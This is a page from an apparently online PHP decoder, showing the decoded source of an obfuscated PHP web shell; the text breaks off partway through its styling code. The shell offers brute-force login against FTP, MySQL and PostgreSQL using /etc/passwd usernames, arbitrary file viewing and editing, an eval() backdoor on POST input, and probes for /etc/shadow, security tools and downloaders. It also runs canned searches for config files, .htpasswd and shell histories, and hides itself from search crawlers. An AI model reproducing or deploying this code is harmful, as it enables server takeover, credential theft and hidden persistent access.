Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
goto e44a6; a676a: if (!empty($_POST['a']) && function_exists('action' . $_POST['a'])) { c..
Decoded Output download
<? goto e44a6; a676a: if (!empty($_POST['a']) && function_exists('action' . $_POST['a'])) { call_user_func('action' . $_POST['a']); } goto A1bb1; D0d0c: function actionBruteforce() { goto E2a48; defb5: if (isset($_POST['proto'])) { goto Eb6da; Ab8ff: if ($_POST['proto'] == 'ftp') { function adugxBruteForce($ip, $port, $login, $pass) { goto a03b5; a03b5: $fp = @ftp_connect($ip, $port ? $port : 21); goto D5322; D5322: if (!$fp) { return false; } goto f4ee9; b0fd4: return $res; goto f1efd; f4ee9: $res = @ftp_login($fp, $login, $pass); goto C6f15; C6f15: @ftp_close($fp); goto b0fd4; f1efd: } } elseif ($_POST['proto'] == 'mysql') { function adugxBruteForce($ip, $port, $login, $pass) { goto e180b; C68fc: @mysql_close($res); goto b451a; e180b: $res = @mysql_connect($ip . ':' . ($port ? $port : 3306), $login, $pass); goto C68fc; b451a: return $res; goto C8b86; C8b86: } } elseif ($_POST['proto'] == 'pgsql') { function adugxBruteForce($ip, $port, $login, $pass) { goto e2039; Fdd73: $res = @pg_connect($str); goto Abab5; e2039: $str = "host='" . $ip . "' port='" . $port . "' user='" . $login . "' password='" . $pass . "' dbname=postgres"; goto Fdd73; A91fa: return $res; goto a637a; Abab5: @pg_close($res); goto A91fa; a637a: } } goto af231; Dfbe3: $server = explode(":", $_POST['server']); goto F49fa; ae8cf: $attempts = 0; goto Dfbe3; Bb016: echo "<span>Attempts:</span> {$attempts} <span>Success:</span> {$success}</div><br>"; goto cefca; Eb6da: echo '<h1>Results</h1><div class=content><span>Type:</span> ' . htmlspecialchars($_POST['proto']) . ' <span>Server:</span> ' . htmlspecialchars($_POST['server']) . '<br>'; goto Ab8ff; F49fa: if ($_POST['type'] == 1) { $temp = @file('/etc/passwd'); if (is_array($temp)) { foreach ($temp as $line) { goto C4cf7; Cf18e: D2d6e: goto Afb32; ad9d4: ++$attempts; goto Be8f1; F5843: if (@$_POST['reverse']) { goto bba3e; A45f5: if (adugxBruteForce(@$server[0], @$server[1], $line[0], $tmp)) { $success++; echo '<b>' . htmlspecialchars($line[0]) . '</b>:' . htmlspecialchars($tmp); } goto a956a; Bb7cf: aacd9: goto C7728; C7728: --$i; goto ac35e; B9162: ad33e: goto Aea3a; df80b: c9132: goto Ee2a5; Aea3a: ++$attempts; goto A45f5; F483f: $tmp .= $line[0][$i]; goto Bb7cf; Ee2a5: if (!($i >= 0)) { goto ad33e; } goto F483f; ac35e: goto c9132; goto B9162; bba3e: $tmp = ""; goto b840c; b840c: $i = strlen($line[0]) - 1; goto df80b; a956a: } goto Cf18e; C4cf7: $line = explode(":", $line); goto ad9d4; Be8f1: if (adugxBruteForce(@$server[0], @$server[1], $line[0], $line[0])) { $success++; echo '<b>' . htmlspecialchars($line[0]) . '</b>:' . htmlspecialchars($line[0]) . '<br>'; } goto F5843; Afb32: } Cadda: } } elseif ($_POST['type'] == 2) { $temp = @file($_POST['dict']); if (is_array($temp)) { foreach ($temp as $line) { goto C44a6; C44a6: $line = trim($line); goto C253e; f72d4: if (adugxBruteForce($server[0], @$server[1], $_POST['login'], $line)) { $success++; echo '<b>' . htmlspecialchars($_POST['login']) . '</b>:' . htmlspecialchars($line) . '<br>'; } goto Cae60; C253e: ++$attempts; goto f72d4; Cae60: D2161: goto cdbb5; cdbb5: } ea9c5: } } goto Bb016; af231: $success = 0; goto ae8cf; cefca: } goto Fc264; Fc264: echo '<h1>Bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>' . '<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>' . '<input type=hidden name=c value="' . htmlspecialchars($GLOBALS['cwd']) . '">' . '<input type=hidden name=a value="' . htmlspecialchars($_POST['a']) . '">' . '<input type=hidden name=charset value="' . htmlspecialchars($_POST['charset']) . '">' . '<span>Server:port</span></td>' . '<td><input type=text name=server value="127.0.0.1"></td></tr>' . '<tr><td><span>Brute type</span></td>' . '<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>' . '<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>' . '<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>' . '<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>' . '<td><input type=text name=login value="root"></td></tr>' . '<tr><td><span>Dictionary</span></td>' . '<td><input type=text name=dict value="' . htmlspecialchars($GLOBALS['cwd']) . 'passwd.dic"></td></tr></table>' . '</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>'; goto cf04d; cf04d: echo '</div><br>'; goto Fb73e; E2a48: adugxHeader(); goto defb5; Fb73e: adugxFooter(); goto F0d60; F0d60: } goto D0149; C0045: function actionFilesTools() { goto ed873; D153b: if (@$_POST['p2'] == 'download') { if (@is_file($_POST['p1']) && @is_readable($_POST['p1'])) { goto d6f9b; D2439: $fp = @fopen($_POST['p1'], "r"); goto ce6eb; F22ce: if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST['p1']); header("Content-Type: " . $type); } else { header("Content-Type: application/octet-stream"); } goto D2439; d6f9b: ob_start("ob_gzhandler", 4096); goto B4bea; ce6eb: if ($fp) { goto a3296; Ccc94: if (@feof($fp)) { goto Fa477; } goto bf194; bb989: fclose($fp); goto cad36; Bc9d9: goto Cccdc; goto e5742; bf194: echo @fread($fp, 1024); goto Bc9d9; a3296: Cccdc: goto Ccc94; e5742: Fa477: goto bb989; cad36: } goto a7a27; B4bea: header("Content-Disposition: attachment; filename=" . basename($_POST['p1'])); goto F22ce; a7a27: } exit; } goto F7390; c418d: echo '<h1>File tools</h1><div class=content>'; goto C3858; B0f0a: echo '</div>'; goto F7327; b5fc6: foreach ($m as $v) { echo '<a href=# onclick="g(null,null,\'' . urlencode($_POST['p1']) . '\',\'' . strtolower($v) . '\')">' . (strtolower($v) == @$_POST['p2'] ? '<b>[ ' . $v . ' ]</b>' : $v) . '</a> '; cd0e9: } goto c1069; F7327: adugxFooter(); goto f2107; d39a5: cba39: goto C7ad6; C7ad6: A7a7a: goto B0f0a; D0126: adugxHeader(); goto c418d; e474d: echo '<span>Change time:</span> ' . date('Y-m-d H:i:s', filectime($_POST['p1'])) . ' <span>Access time:</span> ' . date('Y-m-d H:i:s', fileatime($_POST['p1'])) . ' <span>Modify time:</span> ' . date('Y-m-d H:i:s', filemtime($_POST['p1'])) . '<br><br>'; goto bc614; Ae27e: echo '<br><br>'; goto df889; c1069: b146e: goto Ae27e; F7390: if (@$_POST['p2'] == 'mkfile') { if (!file_exists($_POST['p1'])) { $fp = @fopen($_POST['p1'], 'w'); if ($fp) { $_POST['p2'] = "edit"; fclose($fp); } } } goto D0126; ece68: if (!$uid) { $uid['name'] = @fileowner($_POST['p1']); $gid['name'] = @filegroup($_POST['p1']); } else { $gid = @posix_getgrgid(@filegroup($_POST['p1'])); } goto Ab5dd; C3858: if (!file_exists(@$_POST['p1'])) { goto fc6aa; ca44d: adugxFooter(); goto B3ed1; B3ed1: return; goto Ec2c3; fc6aa: echo 'File not exists'; goto ca44d; Ec2c3: } goto a10ca; df889: switch ($_POST['p2']) { case 'view': goto bf81e; b31c5: if ($fp) { goto ebb6f; C3f30: aa488: goto cf07e; ebb6f: A79ad: goto F116e; cf07e: @fclose($fp); goto b8ea5; d6fba: goto A79ad; goto C3f30; C46a3: echo htmlspecialchars(@fread($fp, 1024)); goto d6fba; F116e: if (@feof($fp)) { goto aa488; } goto C46a3; b8ea5: } goto A1988; D4f01: goto A7a7a; goto D5cc8; A1988: echo '</pre>'; goto D4f01; Be6c6: $fp = @fopen($_POST['p1'], 'r'); goto b31c5; bf81e: echo '<pre class=ml1>'; goto Be6c6; D5cc8: case 'highlight': if (@is_readable($_POST['p1'])) { goto b1d9c; b1d9c: echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">'; goto a0e17; a0e17: $code = @highlight_file($_POST['p1'], true); goto c7f1e; c7f1e: echo str_replace(array('<span ', '</span>'), array('<font ', '</font>'), $code) . '</div>'; goto c8132; c8132: } goto A7a7a; case 'chmod': goto B0b1e; Ae4b5: goto A7a7a; goto B1561; a23a2: echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.chmod.value);return false;"><input type=text name=chmod value="' . substr(sprintf('%o', fileperms($_POST['p1'])), -4) . '"><input type=submit value=">>"></form>'; goto Ae4b5; E3f69: clearstatcache(); goto a23a2; B0b1e: if (!empty($_POST['p3'])) { goto C9932; C9932: $perms = 0; goto C1695; cd4f3: D21c2: goto E1f35; faac6: $perms += (int) $_POST['p3'][$i] * pow(8, strlen($_POST['p3']) - $i - 1); goto A2d2f; D4058: goto be484; goto cd4f3; E1f35: if (!@chmod($_POST['p1'], $perms)) { echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>'; } goto Cbbaf; c6038: if (!($i >= 0)) { goto D21c2; } goto faac6; d59b0: --$i; goto D4058; C1695: $i = strlen($_POST['p3']) - 1; goto a98b6; a98b6: be484: goto c6038; A2d2f: Baf0e: goto d59b0; Cbbaf: } goto E3f69; B1561: case 'edit': goto F92ec; b7dd2: if (!empty($_POST['p3'])) { goto bb1f2; feac1: if ($fp) { goto D700c; D700c: @fwrite($fp, $_POST['p3']); goto c749a; c749a: @fclose($fp); goto df36b; df36b: echo 'Saved!<br><script>p3_="";</script>'; goto B6ba4; B6ba4: @touch($_POST['p1'], $time, $time); goto c34cd; c34cd: } goto E91d5; cc574: $_POST['p3'] = substr($_POST['p3'], 1); goto D989d; bb1f2: $time = @filemtime($_POST['p1']); goto cc574; D989d: $fp = @fopen($_POST['p1'], "w"); goto feac1; E91d5: } goto E23bd; c217b: goto A7a7a; goto b04ba; C8fe6: if ($fp) { goto d5280; Af5b1: @fclose($fp); goto d22bc; defa3: if (@feof($fp)) { goto A381c; } goto d8c74; d8c74: echo htmlspecialchars(@fread($fp, 1024)); goto ceed1; ceed1: goto Aaa32; goto b9a23; d5280: Aaa32: goto defa3; b9a23: A381c: goto Af5b1; d22bc: } goto d1e76; E23bd: echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>'; goto e8f17; d1e76: echo '</textarea><input type=submit value=">>"></form>'; goto c217b; e8f17: $fp = @fopen($_POST['p1'], 'r'); goto C8fe6; F92ec: if (!is_writable($_POST['p1'])) { echo 'File isn\'t writeable'; goto A7a7a; } goto b7dd2; b04ba: case 'hexdump': goto Daefa; d23ce: d135b: goto F0cf0; Ace22: $i = 0; goto cc138; Dc309: $h = array('00000000<br>', '', ''); goto ee9e5; ba865: e6f6a: goto Af013; bcbd6: ++$i; goto D5afc; cc138: a81a9: goto f0e92; F0cf0: e1f09: goto Dfd41; f01f8: ac7c1: goto bcbd6; ec76c: $n = 0; goto Dc309; F7904: goto A7a7a; goto Bfe4a; f0e92: if (!($i < $len)) { goto e6f6a; } goto E62c8; f0c77: switch (ord($c[$i])) { case 0: $h[2] .= ' '; goto e1f09; case 9: $h[2] .= ' '; goto e1f09; case 10: $h[2] .= ' '; goto e1f09; case 13: $h[2] .= ' '; goto e1f09; default: $h[2] .= $c[$i]; goto e1f09; } goto d23ce; Daefa: $c = @file_get_contents($_POST['p1']); goto ec76c; E62c8: $h[1] .= sprintf('%02X', ord($c[$i])) . ' '; goto f0c77; ee9e5: $len = strlen($c); goto Ace22; Af013: echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>' . $h[0] . '</pre></span></td><td bgcolor=#282828><pre>' . $h[1] . '</pre></td><td bgcolor=#333333><pre>' . htmlspecialchars($h[2]) . '</pre></td></tr></table>'; goto F7904; D5afc: goto a81a9; goto ba865; Dfd41: $n++; goto e39b1; e39b1: if ($n == 32) { goto b74d5; b292a: if ($i + 1 < $len) { $h[0] .= sprintf('%08X', $i + 1) . '<br>'; } goto A9cb4; b74d5: $n = 0; goto b292a; A9cb4: $h[1] .= '<br>'; goto F58e1; F58e1: $h[2] .= "
"; goto a15a5; a15a5: } goto f01f8; Bfe4a: case 'rename': goto d40d3; d6842: echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.name.value);return false;"><input type=text name=name value="' . htmlspecialchars($_POST['p1']) . '"><input type=submit value=">>"></form>'; goto c68ee; d40d3: if (!empty($_POST['p3'])) { if (!@rename($_POST['p1'], $_POST['p3'])) { echo 'Can\'t rename!<br>'; } else { die('<script>g(null,null,"' . urlencode($_POST['p3']) . '",null,"")</script>'); } } goto d6842; c68ee: goto A7a7a; goto F54ea; F54ea: case 'touch': goto D4e12; b2cd4: clearstatcache(); goto D4bdb; D4e12: if (!empty($_POST['p3'])) { $time = strtotime($_POST['p3']); if ($time) { if (!touch($_POST['p1'], $time, $time)) { echo 'Fail!'; } else { echo 'Touched!'; } } else { echo 'Bad time format!'; } } goto b2cd4; c10bc: goto A7a7a; goto Dc4b8; D4bdb: echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.touch.value);return false;"><input type=text name=touch value="' . date("Y-m-d H:i:s", @filemtime($_POST['p1'])) . '"><input type=submit value=">>"></form>'; goto c10bc; Dc4b8: } goto d39a5; a10ca: $uid = @posix_getpwuid(@fileowner($_POST['p1'])); goto ece68; C962d: if (is_file($_POST['p1'])) { $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch'); } else { $m = array('Chmod', 'Rename', 'Touch'); } goto b5fc6; Ab5dd: echo '<span>Name:</span> ' . htmlspecialchars(@basename($_POST['p1'])) . ' <span>Size:</span> ' . (is_file($_POST['p1']) ? adugxViewSize(filesize($_POST['p1'])) : '-') . ' <span>Permission:</span> ' . adugxPermsColor($_POST['p1']) . ' <span>Owner/Group:</span> ' . $uid['name'] . '/' . $gid['name'] . '<br>'; goto e474d; ed873: if (isset($_POST['p1'])) { $_POST['p1'] = urldecode($_POST['p1']); } goto D153b; bc614: if (empty($_POST['p2'])) { $_POST['p2'] = 'view'; } goto C962d; f2107: } goto effb0; Cf1bb: $default_action = 'FilesMan'; goto de4e7; A9095: $safe_mode = @ini_get('safe_mode'); goto ca9db; Abd9c: if (!empty($auth_pass)) { if (isset($_POST['pass']) && md5($_POST['pass']) == $auth_pass) { adugxsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass); } if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || $_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass) { adugxLogin(); } } goto d6fdb; a7fa4: $disable_functions = @ini_get('disable_functions'); goto D9101; Bf534: if (get_magic_quotes_gpc()) { goto Fcd56; bd439: $_POST = adugxstripslashes($_POST); goto b37ea; Fcd56: function adugxstripslashes($array) { return is_array($array) ? array_map('adugxstripslashes', $array) : stripslashes($array); } goto bd439; b37ea: $_COOKIE = adugxstripslashes($_COOKIE); goto Bc6e1; Bc6e1: } goto Ee2ae; Bbf18: if (!empty($_SERVER['HTTP_USER_AGENT'])) { $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler"); if (preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) { header('HTTP/1.0 404 Not Found'); exit; } } goto dc9a6; ebd9f: function actionSecInfo() { goto ea1fb; b8d51: adugxSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir')); goto ead0a; ac402: echo '</div>'; goto D8e5f; F9970: echo '<br>'; goto A7864; Ea04e: adugxSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); goto b8d51; A7864: if ($GLOBALS['os'] == 'nix') { goto Ec89b; c240e: adugxSecParam('Distr name', @file_get_contents('/etc/issue.net')); goto effff; Ec89b: adugxSecParam('Readable /etc/passwd', @is_readable('/etc/passwd') ? "yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>" : 'no'); goto fc97c; effff: if (!$GLOBALS['safe_mode']) { goto F931f; Af984: adugxSecParam('HDD space', adugxEx('df -h')); goto c0232; D0a01: foreach ($downloaders as $item) { if (adugxWhich($item)) { $temp[] = $item; } C15db: } goto Fe1b4; A3c77: ebebb: goto ce9ba; dd806: echo '<br/>'; goto Af984; ce9ba: adugxSecParam('Danger', implode(', ', $temp)); goto f12de; E304f: echo '<br>'; goto c3ce3; bfdc3: if (isset($_POST['p2'], $_POST['p3']) && is_numeric($_POST['p2']) && is_numeric($_POST['p3'])) { goto a2844; d15b4: if (!($_POST['p2'] <= $_POST['p3'])) { goto Bede7; } goto D011c; Dc5a0: if ($uid) { $temp .= join(':', $uid) . "
"; } goto Bf36a; cc293: goto E1bb1; goto Dd019; F6b5c: $_POST['p2']++; goto cc293; d665f: E1bb1: goto d15b4; D011c: $uid = @posix_getpwuid($_POST['p2']); goto Dc5a0; c311f: adugxSecParam('Users', $temp); goto De131; Dd019: Bede7: goto cad9b; a2844: $temp = ""; goto d665f; Bf36a: Ed417: goto F6b5c; cad9b: echo '<br/>'; goto c311f; De131: } goto e2b14; Ba707: adugxSecParam('Downloaders', implode(', ', $temp)); goto dd806; F7a6d: foreach ($userful as $item) { if (adugxWhich($item)) { $temp[] = $item; } Cc101: } goto Df5cf; f12de: $temp = array(); goto D0a01; E887a: $downloaders = array('wget', 'fetch', 'lynx', 'links', 'curl', 'get', 'lwp-mirror'); goto E304f; c0232: adugxSecParam('Hosts', @file_get_contents('/etc/hosts')); goto Da3e7; Da3e7: echo '<br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>'; goto bfdc3; Db54d: adugxSecParam('Userful', implode(', ', $temp)); goto dcc71; F931f: $userful = array('gcc', 'lcc', 'cc', 'ld', 'make', 'php', 'perl', 'python', 'ruby', 'tar', 'gzip', 'bzip', 'bzip2', 'nc', 'locate', 'suidperl'); goto e4812; Df5cf: D5aeb: goto Db54d; c3ce3: $temp = array(); goto F7a6d; E71a3: foreach ($danger as $item) { if (adugxWhich($item)) { $temp[] = $item; } A799b: } goto A3c77; e4812: $danger = array('kav', 'nod32', 'bdcored', 'uvscan', 'sav', 'drwebd', 'clamd', 'rkhunter', 'chkrootkit', 'iptables', 'ipfw', 'tripwire', 'shieldcc', 'portsentry', 'snort', 'ossec', 'lidsadm', 'tcplodg', 'sxid', 'logcheck', 'logwatch', 'sysmask', 'zmbscap', 'sawmill', 'wormscan', 'ninja'); goto E887a; dcc71: $temp = array(); goto E71a3; Fe1b4: Ba240: goto Ba707; e2b14: } goto b4ff5; fc97c: adugxSecParam('Readable /etc/shadow', @is_readable('/etc/shadow') ? "yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"shadow\")'>[view]</a>" : 'no'); goto ae908; ae908: adugxSecParam('OS version', @file_get_contents('/proc/version')); goto c240e; b4ff5: } else { goto D2b4d; E39f0: adugxSecParam('Account Settings', adugxEx('net accounts')); goto b8fb5; D2b4d: adugxSecParam('OS Version', adugxEx('ver')); goto E39f0; b8fb5: adugxSecParam('User Accounts', adugxEx('net user')); goto de8bf; de8bf: } goto ac402; cba02: if (function_exists('mysql_get_client_info')) { $temp[] = "MySql (" . mysql_get_client_info() . ")"; } goto b380c; baf11: function adugxSecParam($n, $v) { $v = trim($v); if ($v) { echo '<span>' . $n . ': </span>'; if (strpos($v, "
") === false) { echo $v . '<br>'; } else { echo '<pre class=ml1>' . $v . '</pre>'; } } } goto bec9d; a9f49: if (function_exists('oci_connect')) { $temp[] = "Oracle"; } goto Eccaf; ead0a: adugxSecParam('cURL support', function_exists('curl_version') ? 'enabled' : 'no'); goto Af503; Eccaf: adugxSecParam('Supported databases', implode(', ', $temp)); goto F9970; D8e5f: adugxFooter(); goto B654d; a0e3c: adugxSecParam('Open base dir', @ini_get('open_basedir')); goto Ea04e; ea1fb: adugxHeader(); goto B5f8c; bec9d: adugxSecParam('Server software', @getenv('SERVER_SOFTWARE')); goto C52d2; Af503: $temp = array(); goto cba02; C52d2: if (function_exists('apache_get_modules')) { adugxSecParam('Loaded Apache modules', implode(', ', apache_get_modules())); } goto Ac373; Ac373: adugxSecParam('Disabled PHP Functions', $GLOBALS['disable_functions'] ? $GLOBALS['disable_functions'] : 'none'); goto a0e3c; Fab3c: if (function_exists('pg_connect')) { $temp[] = "PostgreSQL"; } goto a9f49; B5f8c: echo '<h1>Server security information</h1><div class=content>'; goto baf11; b380c: if (function_exists('mssql_connect')) { $temp[] = "MSSQL"; } goto Fab3c; B654d: } goto ffd4b; b0b4b: function actionRC() { if (!@$_POST['p1']) { $a = array("uname" => php_uname(), "php_version" => phpversion(), "adugx_version" => adugx_VERSION, "safemode" => @ini_get('safe_mode')); echo serialize($a); } else { eval($_POST['p1']); } } goto Ba635; E92e7: if ($os == 'win') { $aliases = array("List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all"); } else { $aliases = array("List dir" => "ls -lha", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "process status" => "ps aux", "Find" => "", "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name \"config*\"", "find config* files in current dir" => "find . -type f -name \"config*\"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" => "locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files" => "locate '.conf'", "locate .pwd files" => "locate '.pwd'", "locate .sql files" => "locate '.sql'", "locate .htpasswd files" => "locate '.htpasswd'", "locate .bash_history files" => "locate '.bash_history'", "locate .mysql_history files" => "locate '.mysql_history'", "locate .fetchmailrc files" => "locate '.fetchmailrc'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv"); } goto f5f8c; f5f8c: function adugxHeader() { goto eebb4; Ca843: $j++; goto B54f6; e8fd9: $i = 0; goto Bc24d; d6ffc: $opt_charsets = ''; goto E1a36; b053f: if ($GLOBALS['os'] == 'win') { foreach (range('c', 'z') as $drive) { if (is_dir($drive . ':\')) { $drives .= '<a href="#" onclick="g(\'FilesMan\',\'' . $drive . ':/\')">[ ' . $drive . ' ]</a> '; } a0766: } caa49: } goto De69c; Df8b6: goto F5557; goto B9476; Acc14: if (!empty($GLOBALS['auth_pass'])) { $m['Logout'] = 'Logout'; } goto F256c; B9476: E536e: goto c4a74; ef36f: $totalSpace = @disk_total_space($GLOBALS['cwd']); goto d5f7a; d5e08: Bd886: goto Ca843; Bc24d: F5557: goto Ff5e0; E1a36: foreach ($charsets as $item) { $opt_charsets .= '<option value="' . $item . '" ' . ($_POST['charset'] == $item ? 'selected' : '') . '>' . $item . '</option>'; f464f: } goto F8ca3; cb53e: global $color; goto fe3c6; Aeba1: C3908: goto dad24; D2ef9: $cwd_links .= $path[$j] . '/'; goto d5e08; ec6c8: $kernel = @php_uname('s'); goto d65a7; e6f49: $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\""; goto bfbb4; Ff5e0: if (!($i < $n - 1)) { goto E536e; } goto e6f49; ea093: $cwd_links .= "\")'>" . $path[$i] . "/</a>"; goto db581; F7925: $m = array('Sec. Info' => 'SecInfo', 'Files' => 'FilesMan', 'Console' => 'Console', 'Sql' => 'Sql', 'Php' => 'Php', 'String tools' => 'StringTools', 'Bruteforce' => 'Bruteforce', 'Network' => 'Network'); goto Acc14; dad24: if (!($j <= $i)) { goto ba8af; } goto D2ef9; F256c: $m['Self remove'] = 'SelfRemove'; goto dfe51; c1cc7: $i++; goto Df8b6; Fa7b8: $cwd_links = ''; goto D0d6f; A4e1b: $release = @php_uname('r'); goto ec6c8; B51cd: $freeSpace = @diskfreespace($GLOBALS['cwd']); goto ef36f; De69c: echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:' . ($GLOBALS['os'] == 'win' ? '<br>Drives:' : '') . '</span></td>' . '<td><nobr>' . substr(@php_uname(), 0, 120) . '</nobr><br>' . $uid . ' ( ' . $user . ' ) <span>Group:</span> ' . $gid . ' ( ' . $group . ' )<br>' . @phpversion() . ' <span>Safe mode:</span> ' . ($GLOBALS['safe_mode'] ? '<font color=red>ON</font>' : '<font color=green><b>OFF</b></font>') . ' <a href=# onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> ' . date('Y-m-d H:i:s') . '<br>' . adugxViewSize($totalSpace) . ' <span>Free:</span> ' . adugxViewSize($freeSpace) . ' (' . (int) ($freeSpace / $totalSpace * 100) . '%)<br>' . $cwd_links . ' ' . adugxPermsColor($GLOBALS['cwd']) . ' <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ home ]</a><br>' . $drives . '</td>' . '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">' . $opt_charsets . '</optgroup></select><br><span>Server IP:</span><br>' . @$_SERVER["SERVER_ADDR"] . '<br><span>Client IP:</span><br>' . $_SERVER['REMOTE_ADDR'] . '</nobr></td></tr></table>' . '<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>' . $menu . '</tr></table><div style="margin:5">'; goto Dc2c0; cf9fe: Ae09c: goto E34f4; B54f6: goto C3908; goto F4bb8; d5f7a: $totalSpace = $totalSpace ? $totalSpace : 1; goto A4e1b; E34f4: $drives = ""; goto b053f; d65a7: $explink = ''; goto b2423; c4a74: $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'); goto d6ffc; D0d6f: $path = explode("/", $GLOBALS['cwd']); goto Eb92a; dfe51: $menu = ''; goto c2a99; bfbb4: $j = 0; goto Aeba1; Eb92a: $n = count($path); goto e8fd9; db581: a9bf9: goto c1cc7; E5b43: if (!function_exists('posix_getegid')) { goto da3b0; da3b0: $user = @get_current_user(); goto D386e; D386e: $uid = @getmyuid(); goto ea63e; f0c1d: $group = "?"; goto Eecfe; ea63e: $gid = @getmygid(); goto f0c1d; Eecfe: } else { goto d0e10; c0dea: $gid = $gid['gid']; goto Beffa; D9e60: $user = $uid['name']; goto f62ed; d0e10: $uid = @posix_getpwuid(posix_geteuid()); goto a7757; f62ed: $uid = $uid['uid']; goto Bdef1; a7757: $gid = @posix_getgrgid(posix_getegid()); goto D9e60; Bdef1: $group = $gid['name']; goto c0dea; Beffa: } goto Fa7b8; F4bb8: ba8af: goto ea093; b2423: if (strpos('Linux', $kernel) !== false) { $explink .= urlencode('Linux Kernel ' . substr($release, 0, 6)); } else { $explink .= urlencode($kernel . ' ' . substr($release, 0, 3)); } goto E5b43; F8ca3: C7ad1: goto F7925; eebb4: if (empty($_POST['charset'])) { $_POST['charset'] = $GLOBALS['default_charset']; } goto cb53e; fe3c6: echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . "</title>
<style>
body{background-color:#444;color:#e1e1e1;}
body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }
table.info{ color:#fff;background-color:#222; }
span,h1,a{ color: {$color} !important; }
span{ font-weight: bolder; }
h1{ border-left:5px solid {$color};padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }
div.content{ padding: 5px;margin-left:5px;background-color:#333; }
a{ text-decoration:none; }
a:hover{ text-decoration:underline; }
.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
.bigarea{ width:100%;height:300px; }
input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid {$color}; font: 9pt Monospace,'Courier New'; }
form{ margin:0px; }
#toolsTbl{ text-align:center; }
.toolsInp{ width: 300px }
.main th{text-align:left;background-color:#5e5e5e;}
.main tr:hover{background-color:#5e5e5e}
.l1{background-color:#444}
.l2{background-color:#333}
